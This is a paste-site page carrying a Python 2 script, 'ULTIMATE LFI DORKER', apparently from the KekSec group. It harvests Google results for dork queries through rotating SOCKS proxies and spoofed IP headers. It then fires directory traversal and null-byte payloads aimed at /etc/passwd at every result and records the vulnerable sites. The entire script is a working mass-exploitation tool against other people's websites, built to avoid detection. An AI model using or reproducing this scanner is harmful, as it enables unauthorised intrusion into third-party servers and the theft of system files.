KekSec icon

ULTIMATE LFI DORKER [2019]

KekSec | PRO | 06/25/19 08:44:42 AM UTC | 0 ⭐ | 2606 👁️ | Never ⏰ | []
Python |

6.18 KB

|

None

|

0 👍

/

0 👎

#!/usr/bin/python
#LFI google dork scanner
#coded by Freak/SynthMesc
#Version 1.0.0 first release
import sys,re,random,string,time,threading,os,socket,socks,urllib2,urllib
try:
    dorklist=sys.argv[1]
    proxylist=sys.argv[2]
except:
    print "Usage: " + sys.argv[0] + " [DORK LIST] [PROXY LIST]" #Simple usage for the skids out ther ^_^
    exit(1)
def switchProxy():
    try:
        socket.backup
    except:
        socket.backup = socket.socket
    socket.socket = socket.backup
    proxyhost = random.choice(open(proxylist,"r").read().split("\n")).split(":")
    proxyport = int(proxyhost[1])
    proxyhost = proxyhost[0]
    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, proxyhost, proxyport)
    socket.socket = socks.socksocket
def randomIP():
    return '.'.join('%s'%random.randint(0, 255) for i in range(4)) #Generate random IP for false headers
def fixurl(url, args, testfile, isnull = False):
    for i in range(1, len(args)):
        if "&" in url:
            if isnull:
                url=url.replace(args[i].split("&")[0]+"%00", testfile)
            else:
                url=url.replace(args[i].split("&")[0], testfile)
        else:
            url=url.replace(args[i], testfile)
        return url
def test(url):
    try:
        opener = urllib2.build_opener()
        opener.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
        opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
        opener.addheaders = [('REMOTE-ADDR',randomIP())]
        opener.addheaders = [('VIA',randomIP())]
        opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
        keywords=['nobody:'] # 'cannot be run in DOS'
        testfile = "/etc/passwd"
        args = url.split("=")
        for i in range(1, len(args)):
            for increment in range(0, 6):
                if len(args[i]) <= 2:
                    continue
                if increment % 2 == 0:
                    if args[i].endswith("%00"):
                        url = fixurl(url, args, testfile, True)
                    else:
                        args[i] += "%00"
                        url = fixurl(url, args, testfile, False)
                        print "[+] Trying null byte on "+url
                else:
                    print "[+] Trying on "+url
                try:
                 resp=opener.open(url,timeout=5).read()
                except Exception, e:
                  print("[-] "+str(e))
                  return
                pbody = resp.split("<html")[1:][:-1]
                for keyword in keywords:
                    try:
                        for x in pbody:
                            print "[+] Found keyword '"+keyword+"' at "+url
                            f=open("LFI_Vulnerable.txt","a")
                            f.write(url+"\n")
                            f.close()
                            return
                    except urllib2.HTTPError as e:
                        print("[-] "+str(e))
                        pass
                if increment <= 0:
                    testfile = ".." + testfile
                else:
                    testfile = "../" + testfile
    except urllib2.URLError as e:
        print "[-] "+str(e)
        pass
def spyder(dork,page):
    opener = urllib2.build_opener()
    opener.addheaders = [('User-agent','Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
    opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
    opener.addheaders = [('REMOTE-ADDR',randomIP())]
    opener.addheaders = [('VIA',randomIP())]
    opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
    opener.addheaders = [('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
    opener.addheaders = [('Accept-Language','en-US,en;q=0.5')]
    opener.addheaders = [('Accept-Encoding','gzip, deflate')]
    opener.addheaders = [('Referer',dork)]
    try:
        searchresults=opener.open(dork,timeout=5).read()
    except Exception, e:
        print "[-] "+str(e)
        print "[-] Bot has been blocked from google!!! Switching proxy!"
        switchProxy()
        spyder(dork, page)
    try:
        searchresults
    except NameError:
#       print "[-] Variable undefined, re-searching"
        try:
            searchresults=opener.open(dork,timeout=5).read()
        except:
            try:
                searchresults=opener.open(dork,timeout=5).read()
            except:
                print "[-] Bot has been blocked from google!!! Switching proxy!"
                switchProxy()
                spyder(dork, page)
    else:
        pass
#       print "[+] Variable defined, continuing search"
 
    for i in re.findall('''href=["'](.[^"']+)["']''',searchresults, re.I):
        i=i.replace("amp;",'')
        if i.endswith("start="+str(page)+"0&sa=N") and i.startswith("/search"):
            dorkurl="https://encrypted.google.com"+i
            print("[+] Searching next page "+dorkurl)
            time.sleep(random.randrange(5, 35))
            spyder(dorkurl,page)
            page+=1
        i=urllib2.unquote(i).decode('utf8')
        try:
            i=i.split("?q=")[1]
            i=i.split("&sa=")[0]
            if i.startswith("http"):
                    if "accounts.google.com" in i:
                        continue
                    elif "www.google.com" in i:
                        continue
                    elif "encrypted.google.com" in i:
                        continue
                    elif "webcache.googleusercontent.com" in i:
                        continue
                    elif "support.google.com" in i:
                        continue
                    elif i!=dork.decode('utf8'):
                        threading.Thread(target=test, args=(i,)).start()
        except:
            continue
f=open(dorklist,"r")
for dork in f.read().split("\n"):
    print "[+] Searching for dork: '"+dork+"'"
    spyder('https://encrypted.google.com/search?hl=en&q='+urllib.quote_plus(dork),1)
f.close()

Comments

  •  icon
    01/01/70 12:00:00 AM UTC
    Plain Text |

    0 B

    |

    👍

    /

    👎